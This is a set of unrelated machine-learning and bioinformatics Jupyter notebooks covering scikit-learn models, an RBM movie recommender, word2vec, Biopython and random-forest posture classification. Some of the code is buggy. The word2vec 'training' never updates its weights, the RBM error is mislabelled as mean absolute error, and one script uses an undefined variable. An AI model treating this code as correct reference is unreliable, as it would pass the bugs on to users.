And similarly the predicted probabilities with `.predict_proba`
```
probs = cart.predict_proba(breast.data)
probs
```
Just like in Julia, the probabilities are returned for each class
```
probs.shape
```
We can extract the second column of the probs by slicing, just like how we did it in Julia
```
probs = cart.predict_proba(breast.data)[:,1]
probs
```
To evaluate the model, we can use functions from `sklearn.metrics`
```
from sklearn.metrics import roc_auc_score, accuracy_score, confusion_matrix
roc_auc_score(breast.target, probs)
accuracy_score(breast.target, labels)
confusion_matrix(breast.target, labels)
```
## Random Forests and Boosting
We use random forests and boosting in the same way as CART
```
from sklearn.ensemble import RandomForestClassifier
forest = RandomForestClassifier(n_estimators=100)
forest.fit(breast.data, breast.target)
labels = forest.predict(breast.data)
probs = forest.predict_proba(breast.data)[:,1]
print(roc_auc_score(breast.target, probs))
print(accuracy_score(breast.target, labels))
confusion_matrix(breast.target, labels)
from sklearn.ensemble import GradientBoostingClassifier
boost = GradientBoostingClassifier(n_estimators=100, learning_rate=0.1)
boost.fit(breast.data, breast.target)
labels = boost.predict(breast.data)
probs = boost.predict_proba(breast.data)[:,1]
print(roc_auc_score(breast.target, probs))
print(accuracy_score(breast.target, labels))
confusion_matrix(breast.target, labels)
```
## Logistic Regression
We can also access logistic regression from sklearn
```
from sklearn.linear_model import LogisticRegression
logit = LogisticRegression()
logit.fit(breast.data, breast.target)
labels = logit.predict(breast.data)
probs = logit.predict_proba(breast.data)[:,1]
print(roc_auc_score(breast.target, probs))
print(accuracy_score(breast.target, labels))
confusion_matrix(breast.target, labels)
```
The sklearn implementation has options for regularization in logistic regression. You can choose between L1 and L2 regularization:


Note that this regularization is adhoc and **not equivalent to robustness**. For a robust logistic regression, follow the approach from 15.680.
You control the regularization with the `penalty` and `C` hyperparameters. We can see that our model above used L2 regularization with $C=1$.
### Exercise
Try out unregularized logistic regression as well as L1 regularization. Which of the three options seems best? What if you try changing $C$?
```
# No regularization
logit = LogisticRegression(C=1e10)
logit.fit(breast.data, breast.target)
labels = logit.predict(breast.data)
probs = logit.predict_proba(breast.data)[:,1]
print(roc_auc_score(breast.target, probs))
print(accuracy_score(breast.target, labels))
confusion_matrix(breast.target, labels)
# L1 regularization
logit = LogisticRegression(C=100, penalty='l1')
logit.fit(breast.data, breast.target)
labels = logit.predict(breast.data)
probs = logit.predict_proba(breast.data)[:,1]
print(roc_auc_score(breast.target, probs))
print(accuracy_score(breast.target, labels))
confusion_matrix(breast.target, labels)
```
# Regression
Now let's take a look at regression in sklearn. Again we can start by loading up a dataset.
```
from sklearn.datasets import load_boston
boston = load_boston()
print(boston.DESCR)
```
Take a look at the X
```
df = pd.DataFrame(boston.data)
df.columns = boston.feature_names
df
boston.target
```
## Regression Trees
We use regression trees in the same way as classification
```
from sklearn.tree import DecisionTreeRegressor
cart = DecisionTreeRegressor(max_depth=2, min_samples_leaf=5)
cart.fit(boston.data, boston.target)
visualize_tree(cart)
```
Like for classification, we get the predicted labels out with the `.predict` method
```
preds = cart.predict(boston.data)
preds
```
There are functions provided by `sklearn.metrics` to evaluate the predictions
```
from sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
```
## Random Forests and Boosting
Random forests and boosting for regression work the same as in classification, except we use the `Regressor` version rather than `Classifier`.
### Exercise
Test and compare the (in-sample) performance of random forests and boosting on the Boston data with some sensible parameters.
```
from sklearn.ensemble import RandomForestRegressor
forest = RandomForestRegressor(n_estimators=100)
forest.fit(boston.data, boston.target)
preds = forest.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
from sklearn.ensemble import GradientBoostingRegressor
boost = GradientBoostingRegressor(n_estimators=100, learning_rate=0.2)
boost.fit(boston.data, boston.target)
preds = boost.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
```
## Linear Regression Models
There are a large collection of linear regression models in sklearn. Let's start with a simple ordinary linear regression
```
from sklearn.linear_model import LinearRegression
linear = LinearRegression()
linear.fit(boston.data, boston.target)
preds = linear.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
```
We can also take a look at the betas:
```
linear.coef_
```
We can use regularized models as well. Here is ridge regression:
```
from sklearn.linear_model import Ridge
ridge = Ridge(alpha=10)
ridge.fit(boston.data, boston.target)
preds = ridge.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
ridge.coef_
```
And here is lasso
```
from sklearn.linear_model import Lasso
lasso = Lasso(alpha=1)
lasso.fit(boston.data, boston.target)
preds = lasso.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
lasso.coef_
```
There are many other linear regression models available. See the [linear model documentation](http://scikit-learn.org/stable/modules/linear_model.html) for more.
### Exercise
The elastic net is another linear regression method that combines ridge and lasso regularization. Try running it on this dataset, referring to the documentation as needed to learn how to use it and control the hyperparameters.
```
from sklearn.linear_model import ElasticNet
net = ElasticNet(l1_ratio=0.3, alpha=1)
net.fit(boston.data, boston.target)
preds = net.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
net.coef_
```
| github_jupyter |
<h1 align="center"><font size="5">RECOMMENDATION SYSTEM WITH A RESTRICTED BOLTZMANN MACHINE</font></h1>
Welcome to the <b>Recommendation System with a Restricted Boltzmann Machine</b> notebook. In this notebook, we study and go over the usage of a Restricted Boltzmann Machine (RBM) in a Collaborative Filtering based recommendation system. This system is an algorithm that recommends items by trying to find users that are similar to each other based on their item ratings. By the end of this notebook, you should have a deeper understanding of how Restricted Boltzmann Machines are applied, and how to build one using TensorFlow.
<h2>Table of Contents</h2>
<ol>
<li><a href="#ref1">Acquiring the Data</a></li>
<li><a href="#ref2">Loading in the Data</a></li>
<li><a href="#ref3">The Restricted Boltzmann Machine model</a></li>
<li><a href="#ref4">Setting the Model's Parameters</a></li>
<li><a href="#ref5">Recommendation</a></li>
</ol>
<br>
<br>
<hr>
<a id="ref1"></a>
<h2>Acquiring the Data</h2>
To start, we need to download the data we are going to use for our system. The datasets we are going to use were acquired by <a href="http://grouplens.org/datasets/movielens/">GroupLens</a> and contain movies, users and movie ratings by these users.
After downloading the data, we will extract the datasets to a directory that is easily accessible.
```
!wget -c https://raw.githubusercontent.com/IBM/dl-learning-path-assets/main/unsupervised-deeplearning/data/ml-1m.zip -O moviedataset.zip
!unzip -o moviedataset.zip
```
With the datasets in place, let's now import the necessary libraries. We will be using <a href="https://www.tensorflow.org/">Tensorflow</a> and <a href="http://www.numpy.org/">Numpy</a> together to model and initialize our Restricted Boltzmann Machine and <a href="http://pandas.pydata.org/pandas-docs/stable/">Pandas</a> to manipulate our datasets. To import these libraries, run the code cell below.
```
#Tensorflow library. Used to implement machine learning models
import tensorflow as tf
#Numpy contains helpful functions for efficient mathematical calculations
import numpy as np
#Dataframe manipulation library
import pandas as pd
#Graph plotting library
import matplotlib.pyplot as plt
%matplotlib inline
```
<hr>
<a id="ref2"></a>
<h2>Loading in the Data</h2>
Let's begin by loading in our data with Pandas. The .dat files containing our data are similar to CSV files, but instead of using the ',' (comma) character to separate entries, it uses '::' (two colons) characters instead. To let Pandas know that it should separate data points at every '::', we have to specify the <code>sep='::'</code> parameter when calling the function.
Additionally, we also pass it the <code>header=None</code> parameter due to the fact that our files don't contain any headers.
Let's start with the movies.dat file and take a look at its structure:
```
#Loading in the movies dataset
movies_df = pd.read_csv('ml-1m/movies.dat', sep='::', header=None, engine='python')
movies_df.head()
```
We can do the same for the ratings.dat file:
```
#Loading in the ratings dataset
ratings_df = pd.read_csv('ml-1m/ratings.dat', sep='::', header=None, engine='python')
ratings_df.head()
```
So our <b>movies_df</b> variable contains a dataframe that stores a movie's unique ID number, title and genres, while our <b>ratings_df</b> variable stores a unique User ID number, a movie's ID that the user has watched, the user's rating to said movie and when the user rated that movie.
Let's now rename the columns in these dataframes so we can better convey their data more intuitively:
```
movies_df.columns = ['MovieID', 'Title', 'Genres']
movies_df.head()
```
And our final ratings_df:
```
ratings_df.columns = ['UserID', 'MovieID', 'Rating', 'Timestamp']
ratings_df.head()
```
<hr>
<a id="ref3"></a>
<h2>The Restricted Boltzmann Machine model</h2>
<img src="https://github.com/fawazsiddiqi/recommendation-system-with-a-Restricted-Boltzmann-Machine-using-tensorflow/blob/master/images/films.png?raw=true" width="300">
<br>
The Restricted Boltzmann Machine model has two layers of neurons, one of which is what we call a visible input layer and the other is called a hidden layer. The hidden layer is used to learn features from the information fed through the input layer. For our model, the input is going to contain X neurons, where X is the amount of movies in our dataset. Each of these neurons will possess a normalized rating value varying from 0 to 1, where 0 meaning that a user has not watched that movie and the closer the value is to 1, the more the user likes the movie that neuron's representing. These normalized values, of course, will be extracted and normalized from the ratings dataset.
After passing in the input, we train the RBM on it and have the hidden layer learn its features. These features are what we use to reconstruct the input, which in our case, will predict the ratings for movies that user hasn't watched, which is exactly what we can use to recommend movies!
We will now begin to format our dataset to follow the model's expected input.
<h3>Formatting the Data</h3>
First let's see how many movies we have and see if the movie ID's correspond with that value:
```
len(movies_df)
```
Now, we can start formatting the data into input for the RBM. We're going to store the normalized users ratings into as a matrix of user-rating called trX, and normalize the values.
```
user_rating_df = ratings_df.pivot(index='UserID', columns='MovieID', values='Rating')
user_rating_df.head()
```
Lets normalize it now:
```
norm_user_rating_df = user_rating_df.fillna(0) / 5.0
trX = norm_user_rating_df.values
trX[0:5]
```
<hr>
<a id="ref4"></a>
<h2>Setting the Model's Parameters</h2>
Next, let's start building our RBM with TensorFlow. We'll begin by first determining the number of neurons in the hidden layers and then creating placeholder variables for storing our visible layer biases, hidden layer biases and weights that connects the hidden layer with the visible layer. We will be arbitrarily setting the number of neurons in the hidden layers to 20. You can freely set this value to any number you want since each neuron in the hidden layer will end up learning a feature.
```
hiddenUnits = 20
visibleUnits = len(user_rating_df.columns)
vb = tf.Variable(tf.zeros([visibleUnits]), tf.float32) #Number of unique movies
hb = tf.Variable(tf.zeros([hiddenUnits]), tf.float32) #Number of features we're going to learn
W = tf.Variable(tf.zeros([visibleUnits, hiddenUnits]), tf.float32)
```
We then move on to creating the visible and hidden layer units and setting their activation functions. In this case, we will be using the <code>tf.sigmoid</code> and <code>tf.relu</code> functions as nonlinear activations since it is commonly used in RBM's.
```
v0 = tf.zeros([visibleUnits], tf.float32)
#testing to see if the matrix product works
tf.matmul([v0], W)
#Phase 1: Input Processing
#defining a function to return only the generated hidden states
def hidden_layer(v0_state, W, hb):
h0_prob = tf.nn.sigmoid(tf.matmul([v0_state], W) + hb) #probabilities of the hidden units
h0_state = tf.nn.relu(tf.sign(h0_prob - tf.random.uniform(tf.shape(h0_prob)))) #sample_h_given_X
return h0_state
#printing output of zeros input
h0 = hidden_layer(v0, W, hb)
print("first 15 hidden states: ", h0[0][0:15])
def reconstructed_output(h0_state, W, vb):
v1_prob = tf.nn.sigmoid(tf.matmul(h0_state, tf.transpose(W)) + vb)
v1_state = tf.nn.relu(tf.sign(v1_prob - tf.random.uniform(tf.shape(v1_prob)))) #sample_v_given_h
return v1_state[0]
v1 = reconstructed_output(h0, W, vb)
print("hidden state shape: ", h0.shape)
print("v0 state shape: ", v0.shape)
print("v1 state shape: ", v1.shape)
```
And set the error function, which in this case will be the Mean Absolute Error Function.
```
def error(v0_state, v1_state):
return tf.reduce_mean(tf.square(v0_state - v1_state))
err = tf.reduce_mean(tf.square(v0 - v1))
print("error" , err.numpy())
```
Now we train the RBM with 5 epochs with each epoch using a batchsize of 500, giving 12 batches. After training, we print out a graph with the error by epoch.
```
epochs = 5
batchsize = 500
errors = []
weights = []
K=1
alpha = 0.1
#creating datasets
train_ds = \
tf.data.Dataset.from_tensor_slices((np.float32(trX))).batch(batchsize)
#for i in range(epochs):
# for start, end in zip( range(0, len(trX), batchsize), range(batchsize, len(trX), batchsize)):
# batch = trX[start:end]
# cur_w = sess.run(update_w, feed_dict={v0: batch, W: prv_w, vb: prv_vb, hb: prv_hb})
# cur_vb = sess.run(update_vb, feed_dict={v0: batch, W: prv_w, vb: prv_vb, hb: prv_hb})
# cur_nb = sess.run(update_hb, feed_dict={v0: batch, W: prv_w, vb: prv_vb, hb: prv_hb})
# prv_w = cur_w
# prv_vb = cur_vb
# prv_hb = cur_hb
# errors.append(sess.run(err_sum, feed_dict={v0: trX, W: cur_w, vb: cur_vb, hb: cur_hb}))
# print (errors[-1])
v0_state=v0
for epoch in range(epochs):
batch_number = 0
for batch_x in train_ds:
for i_sample in range(len(batch_x)):
for k in range(K):
v0_state = batch_x[i_sample]
h0_state = hidden_layer(v0_state, W, hb)
v1_state = reconstructed_output(h0_state, W, vb)
h1_state = hidden_layer(v1_state, W, hb)
delta_W = tf.matmul(tf.transpose([v0_state]), h0_state) - tf.matmul(tf.transpose([v1_state]), h1_state)
W = W + alpha * delta_W
vb = vb + alpha * tf.reduce_mean(v0_state - v1_state, 0)
hb = hb + alpha * tf.reduce_mean(h0_state - h1_state, 0)
v0_state = v1_state
if i_sample == len(batch_x)-1:
err = error(batch_x[i_sample], v1_state)
errors.append(err)
weights.append(W)
print ( 'Epoch: %d' % (epoch + 1),
"batch #: %i " % batch_number, "of %i" % (len(trX)/batchsize),
"sample #: %i" % i_sample,
'reconstruction error: %f' % err)
batch_number += 1
plt.plot(errors)
plt.ylabel('Error')
plt.xlabel('Epoch')
plt.show()
```
<hr>
<a id="ref5"></a>
<h2>Recommendation</h2>
We can now predict movies that an arbitrarily selected user might like. This can be accomplished by feeding in the user's watched movie preferences into the RBM and then reconstructing the input. The values that the RBM gives us will attempt to estimate the user's preferences for movies that he hasn't watched based on the preferences of the users that the RBM was trained on.
Lets first select a <b>User ID</b> of our mock user:
```
mock_user_id = 215
#Selecting the input user
inputUser = trX[mock_user_id-1].reshape(1, -1)
inputUser = tf.convert_to_tensor(trX[mock_user_id-1],"float32")
v0 = inputUser
print(v0)
v0.shape
v0test = tf.zeros([visibleUnits], tf.float32)
v0test.shape
#Feeding in the user and reconstructing the input
hh0 = tf.nn.sigmoid(tf.matmul([v0], W) + hb)
vv1 = tf.nn.sigmoid(tf.matmul(hh0, tf.transpose(W)) + vb)
rec = vv1
tf.maximum(rec,1)
for i in vv1:
print(i)
```
We can then list the 20 most recommended movies for our mock user by sorting it by their scores given by our model.
```
scored_movies_df_mock = movies_df[movies_df['MovieID'].isin(user_rating_df.columns)]
scored_movies_df_mock = scored_movies_df_mock.assign(RecommendationScore = rec[0])
scored_movies_df_mock.sort_values(["RecommendationScore"], ascending=False).head(20)
```
So, how to recommend the movies that the user has not watched yet?
Now, we can find all the movies that our mock user has watched before:
```
movies_df_mock = ratings_df[ratings_df['UserID'] == mock_user_id]
movies_df_mock.head()
```
In the next cell, we merge all the movies that our mock users has watched with the predicted scores based on his historical data:
```
#Merging movies_df with ratings_df by MovieID
merged_df_mock = scored_movies_df_mock.merge(movies_df_mock, on='MovieID', how='outer')
```
lets sort it and take a look at the first 20 rows:
```
merged_df_mock.sort_values(["RecommendationScore"], ascending=False).head(20)
```
As you can see, there are some movies that user has not watched yet and has high score based on our model. So, we can recommend them to the user.
This is the end of the tutorial. If you want, you can try to change the parameters in the code -- adding more units to the hidden layer, changing the loss functions or maybe something else to see if it changes anything. Optimization settings can also be adjusted...the number of epochs, the size of K, and the batch size are all interesting numbers to explore.
Does the model perform better? Does it take longer to compute?
Thank you for reading this notebook. Hopefully, you now have a little more understanding of the RBM model, its applications and how it works with TensorFlow.
<hr>
## Want to learn more?
You can use __Watson Studio__ to run these notebooks faster with bigger datasets.__Watson Studio__ is IBM’s leading cloud solution for data scientists, built by data scientists. With Jupyter notebooks, RStudio, Apache Spark and popular libraries pre-packaged in the cloud, __Watson Studio__ enables data scientists to collaborate on their projects without having to install anything. Join the fast-growing community of __Watson Studio__ users today with a free account at [Watson Studio](http://ibm.biz/WatsonStudioRBM).This is the end of this lesson. Thank you for reading this notebook, and good luck on your studies.
### Thank you for completing this exercise!
Notebook created by: <a href = "https://ca.linkedin.com/in/saeedaghabozorgi">Saeed Aghabozorgi</a>, Gabriel Garcez Barros Sousa
Updated to TF 2.X by <a href="https://ca.linkedin.com/in/nilmeier"> Jerome Nilmeier</a><br />
Added to IBM Developer by <a href=https://www.linkedin.com/in/fawazsiddiqi/> Mohammad Fawaz Siddiqi </a> <br/>
<hr>
Copyright © 2020 [Cognitive Class](https://cocl.us/DX0108EN_CC). This notebook and its source code are released under the terms of the [MIT License](https://bigdatauniversity.com/mit-license/).
| github_jupyter |
```
import pickle as pk
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.patches as mpatches
import os
import csv
# EDS_files = [
# 'cora_sampling_method=EDS_K_sparsity=100_results.p',
# 'cora_sampling_method=EDS_K_sparsity=10_results.p',
# 'cora_sampling_method=EDS_K_sparsity=5_results.p' ]
Greedy_files = [
'citeseer_sampling_method=Greedy_K_sparsity=100_label_balance=Greedy_noise=0.01_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=100_label_balance=Greedy_noise=100_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=100_label_balance=Greedy_noise=1_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=10_label_balance=Greedy_noise=0.01_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=10_label_balance=Greedy_noise=100_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=10_label_balance=Greedy_noise=1_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=5_label_balance=Greedy_noise=0.01_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=5_label_balance=Greedy_noise=100_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=5_label_balance=Greedy_noise=1_results.p']
max_files = ['citeseer_sampling_method=MaxDegree_maxdegree_results.p']
random_file = ['citeseer_sampling_method=Random_random_results.p']
def open_files(files):
file_content = []
for file in files:
try:
with open(file, 'rb') as f:
file_content.append(pk.load(f, encoding='latin1'))
except Exception as e:
print(e)
print("No " + file)
return file_content
# eds_results = open_files(EDS_files)
geedy_results = open_files(Greedy_files)
max_results = open_files(max_files)
random_results = open_files(random_file)
def results_to_lines(results,sampling_title):
lines = []
for result in results:
line = result['results']
x = []
y = []
var = []
for point in line:
x.append(point[1])
y.append(point[2])
var.append(point[3])
lines.append((x,y,var,result['info']))
csvData = [[point[1],point[2],point[3]]for point in line ]
file_name = sampling_title +"_"+ result['info']['params']['params']['dataset']
if 'K_sparsity' in result['info']:
file_name = file_name+"_"+str(result['info']['K_sparsity'])
if 'noise' in result['info']:
file_name = file_name+"_"+str(result['info']['noise'])
file_name+=".csv"
print(file_name)
with open(file_name, 'w') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(csvData)
csvFile.close()
return lines
random_ref_line = results_to_lines(random_results, "Random")[0]
def plot(title, save_file,lines, label_name = None):
plt.errorbar(random_ref_line[0],random_ref_line[1],yerr=random_ref_line[2],alpha = 0.7,color = 'r',label="Random sampling",fmt='o-')
for line in lines:
if label_name is not None:
plt.errorbar(line[0],line[1],yerr=line[2],alpha = 0.5,label=label_name+":"+str(line[3][label_name]),fmt='o-')
else:
plt.errorbar(line[0],line[1],yerr=line[2],alpha = 0.5,fmt='o-')
plt.legend(loc=4)
plt.grid(True)
plt.savefig(os.path.join('../report_citeseer',save_file), bbox_inches="tight", dpi = 300)
#plot("EDS sampling","EDS_sampling_K_100.jpg",results_to_lines(eds_results)[0:1],'K_sparsity')
#results_to_lines(geedy_results,"Greedy")
plot("EDS sampling","EDS_sampling_K10.jpg",results_to_lines(eds_results)[1:2],'K_sparsity')
plot("EDS sampling","EDS_sampling_K5.jpg",results_to_lines(eds_results)[2:3],'K_sparsity')
plot("Greedy sampling, K sparsity = 100 ","Greedy_K100_sampling.jpg",results_to_lines(geedy_results[0:3],"Greedy"),'noise')
plot("Greedy sampling, K sparsity = 10 ","Greedy_K10_sampling.jpg",results_to_lines(geedy_results[3:6],"Greedy"),'noise')
plot("Greedy sampling, K sparsity = 5 ","Greedy_K5_sampling.jpg",results_to_lines(geedy_results[6:9],"Greedy"),'noise')
plot("Max degree sampling,","Max_sampling.jpg",results_to_lines(max_results,"Max"))
```
| github_jupyter |
# **Neural Word Embedding**
> **Word2Vec, Continuous Bag of Word (CBOW)**
> **Word2Vec, Skip-gram with negative sampling (SGNS)**
> **Main key point: Distributional Hypothesis**
> Goal: Predict the context words from a given word
# **How to implement SGNS Algorithm:**
1. Data preprocessing
2. Hyperparameters
3. Training Data
4. Model Fitting
5. Inference/Prediction the testing samples
### **Main Class**
```
from collections import defaultdict
import numpy as np
class word2vec():
def __init__(self):
self.n = hyperparameters['n']
self.learningrate = hyperparameters['learning_rate']
self.epochs = hyperparameters['epochs']
self.windowsize = hyperparameters['window_size']
def word2onehot(self, word):
word_vector = np.zeros(self.vocabulary_count)
word_index = self.word_index[word]
word_vector[word_index] = 1
return word_vector
def generate_training_data(self, setting, corpus):
word_counts = defaultdict(int)
# print(word_counts)
for row in corpus:
for token in row:
word_counts[token] +=1
#print(word_counts)
self.vocabulary_count = len(word_counts.keys())
#print(self.vocabulary_count)
self.words_list = list(word_counts.keys())
#print(self.words_list)
self.word_index = dict((word, i) for i, word in enumerate(self.words_list))
#print(self.word_index)
self.index_word = dict((i, word) for i, word in enumerate(self.words_list))
#print(self.index_word)
training_data = []
for sentence in corpus:
sentence_length = len(sentence)
for i , word in enumerate(sentence):
word_target = self.word2onehot(sentence[i])
#print(word_target)
word_context = []
for j in range(i - self.windowsize, i + self.windowsize + 1):
if j !=i and j <= sentence_length - 1 and j >= 0:
word_context.append(self.word2onehot(sentence[j]))
# print(word_context)
training_data.append([word_target, word_context])
return np.array(training_data)
def model_training(self, training_data):
self.w1 = np.random.uniform(-1, 1, (self.vocabulary_count, self.n))
self.w2 = np.random.uniform(-1, 1, (self.n, self.vocabulary_count))
for i in range(0, self.epochs):
# self.loss = 0
for word_target, word_context in training_data:
h, u, y_pred= self.forward_pass(word_target)
# print(y_pred)
def forward_pass(self, x):
h = np.dot(self.w1.T, x)
u = np.dot(self.w2.T, h)
y_pred= self.softmax(u)
return h, u, y_pred
def softmax(self, x):
e = np.exp(x - np.max(x))
return e / e.sum(axis=0)
def word_vector(self, word):
word_index = self.word_index[word]
word_vector = self.w1[word_index]
return word_vector
def similar_vectors(self, word, n):
vw1 = self.word_vector(word)
word_similar={}
for i in range(self.vocabulary_count):
vw2 = self.w1[i]
theta_nom= np.dot(vw1, vw2)
theta_denom = np.linalg.norm(vw1) * np.linalg.norm(vw2)
theta = theta_nom / theta_denom
# print(theta)
word = self.index_word[i]
word_similar[word] = theta
# {k: v for k, v in sorted(x.items(), key=lambda item: item[1])}
words_sorted = sorted(word_similar.items(), key=lambda ss: ss[1], reverse=True)
for word, similar in words_sorted[:n]:
print(word, similar)
```
### **1.Data PreProcessing**
```
# Define the mini corpus
document = "A combination of Machine Learning and Natural Language Processing works well"
# Tokenizing and build a vocabulary
corpus = [[]]
for token in document.split():
corpus[0].append(token.lower())
print(corpus)
```
### **2. Hyperparameters**
```
hyperparameters = {
'window_size': 2, #it covers two words left and two words right
'n': 11, # dimension of word embedding
'epochs': 40, # number of training epochs
'learning_rate': 0.01, # a coefficient for updating weights
}
```
### **3. Generate Training Data**
```
# we need to create one-hot vector based on our given corpus
# 1 [target(a)], [context(combination, of)] == [10000000000],[01000000000][00100000000]
# instance
w2v = word2vec()
training_data = w2v.generate_training_data(hyperparameters, corpus)
# print(training_data)
```
### **4. Model Training**
```
w2v.model_training(training_data)
```
### **5. Model Prediction**
```
vector = w2v.word_vector("works")
print(vector)
```
### **Finding Similar Words**
```
w2v.similar_vectors("works", 5)
```
| github_jupyter |
# Introduction to BioPython
```
# Load Biopython library & Functions
import Bio
from Bio import SeqIO
from Bio.Seq import Seq, MutableSeq
from Bio.Seq import transcribe, back_transcribe, translate, complement, reverse_complement
# Check Biopython version
Bio.__version__
```
## Sequence Operations
```
# Sequence
seq = Seq("GGACCTGGAACAGGCTGAACCCTTTATCCACCTCTCTCCAATTATACCTATCATCCTAACTTCTCAGTGGACCTAACAATCTTCTCCCTTCATCTAGCAGGAGTC")
# Alphabet
seq.alphabet
# Check type
type(seq.alphabet)
# Find sub-sequence: if TRUE <- SubSeq Position, else <- return -1
seq.find("ATC")
seq.find("ATGC")
# Number of `A`
seq.count("A")
# Number of `C`
seq.count("C")
# Number of `T`
seq.count("T")
# Number of `G`
seq.count("G")
# K-mer analysis, K = 2(AA)<--dimer
seq.count("AA")
# K-mer analysis, K = 3(AAA)<--trimer
seq.count("AAA")
# Count frequency of nucleotides
from collections import Counter
freq = Counter(seq)
print(freq)
# Reverse
print(f'RefSeq: {seq}')
rev = str(seq[::-1])
print(f'RevSeq: {rev}')
# Complement
print(f'RefSeq: {seq}')
com = seq.complement()
print(f'ComSeq: {com}')
# Reverse complement
print(f'RefSeq: {seq}')
rev_com = seq.reverse_complement()
print(f'RevCom: {rev_com}')
# Transcription(DNA ==> RNA)
print(f'DNA: {seq}')
rna = seq.transcribe()
print(f'RNA: {rna}')
# Back Transcription(RNA ==> DNA)
print(f'RNA: {rna}')
dna = rna.back_transcribe()
print(f'DNA: {dna}')
# Translation(DNA ==> Protein)
print(f'DNA: {seq}')
prt = seq.translate()
print(f'Protein: {prt}')
# Let's varify the protein with length property
len(seq)
# Make codons
len(seq) % 3
# Number of codons
len(seq) / 3
# Now varify the protein length
len(prt)
# Translation(DNA ==> Protein) Stop translation when found stop codon
print(f'DNA: {seq}')
prt = seq.translate(to_stop=True)
print(f'Protein: {prt}')
# Translation(DNA ==> Protein) for Mitochondrial DNA
print(f'DNA: {seq}')
prt = seq.translate(to_stop=True, table=2)
print(f'Protein: {prt}')
```
## Handling Files
```
for seq_record in SeqIO.parse("../data/den1.fasta", "fasta"):
ID = seq_record.id
seqs = seq_record.seq[:100]
rep = repr(seq_record)
length = len(seq_record)
# ID
print(ID)
# Sequence
print(seqs)
# Representation
print(rep)
# Length
print(length)
# Print the first nucleotide of each codon
seqs[0::3]
# Print the first codon position
seqs[1::3]
# Print the second codon position
seqs[2::3]
# Sequence Length Comparison
seq1 = Seq("TTGTGGCCGCTCAGATCAGGCAGTTTAGGCTTA")
seq2 = Seq("ATTTATAGAAATGTGGTTATTTCTTAAGCATGGC")
seq1 == seq2
# Mutable sequence
mut_seq = MutableSeq("TTGTGGCCGCTCAGATCAGGCAGTTTAGGCTTA")
print(f'MutSeq: {mut_seq}')
mut_seq[5] == "C"
print(mut_seq)
mut_seq.remove("T")
print(mut_seq)
mut_seq.reverse()
print(mut_seq)
!wget http://d28rh4a8wq0iu5.cloudfront.net/ads1/data/SRR835775_1.first1000.fastq
# Working with Fastq files
for record in SeqIO.parse("SRR835775_1.first1000.fastq", "fastq"):
print(record)
print(record.seq)
print(record.letter_annotations['phred_quality'])
quals = [record.letter_annotations['phred_quality'] for record in SeqIO.parse("SRR835775_1.first1000.fastq", "fastq")]
import matplotlib.pyplot as plt
plt.hist(quals, bins=10)
plt.title("Distribution of Phred Quality Score")
plt.xlabel("Base Position")
plt.ylabel("Phred Score")
plt.show()
sequences = [record.seq for record in SeqIO.parse("SRR835775_1.first1000.fastq", "fastq")]
sequences[:100]
```
| github_jupyter |
# Import Package
```
import math
import datetime
import numpy as np
import pandas as pd
from entropy import *
from collections import Counter
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from scipy.interpolate import interp1d
import random
import joblib
import sklearn
from sklearn import metrics
import sklearn.model_selection
from xgboost.sklearn import XGBClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import KFold
from sklearn import svm
import lightgbm as lgb
from lightgbm.sklearn import LGBMClassifier
from sklearn.pipeline import Pipeline
# from sklearn.externals import joblib
from sklearn.metrics import confusion_matrix
from sklearn.preprocessing import label_binarize
from sklearn.multiclass import OneVsRestClassifier
from scipy import interp
from sklearn.metrics import roc_auc_score
from itertools import cycle
from sklearn.metrics import roc_curve, auc
from sklearn.metrics import accuracy_score
import datetime
from sklearn.model_selection import ShuffleSplit
import scipy.io as sio
```
# Load Dataset
```
matfn = 'posture_6_data.mat'
data = sio.loadmat(matfn)
trainSet = data['x_train']
testSet = data['x_test']
trainLabel = data['y_train']
testLabel = data['y_test']
trainSet = np.array(trainSet )
testSet = np.array(testSet )
trainLabel = np.array(trainLabel).ravel()
testLabel = np.array(testLabel ).ravel()
className = ['no motion', 'sit & stand', 'walk', 'run', 'turn left', 'turn right']
# replace label with string
trainLabel = [className[i] for i in trainLabel]
testLabel = [className[i] for i in testLabel ]
print("trainSet", trainSet.shape)
print("testSet ", testSet.shape)
# print("trainLabel", trainLabel.shape)
# print("testLabel ", testLabel.shape)
```
# Random Forest
```
rf= RandomForestClassifier(random_state=0, n_estimators=1000, max_depth=5, n_jobs=4, class_weight="balanced")
starttime = datetime.datetime.now()
rf.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print("training time:", endtime - starttime)
starttime = datetime.datetime.now()
rfResult = rf.predict(testSet)
endtime = datetime.datetime.now()
print("testing time:", (endtime - starttime))
# print(rfResult)
# save the model
joblib.dump(rf, "model/rf_model.m")
from sklearn.metrics import f1_score
print("F-score: {0:.2f}".format(f1_score(rfResult,testLabel,average='micro')))
print("the accurancy is :",np.mean(rfResult == testLabel))
lw =2
proba = rf.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=[0,1,2,3,4,5])
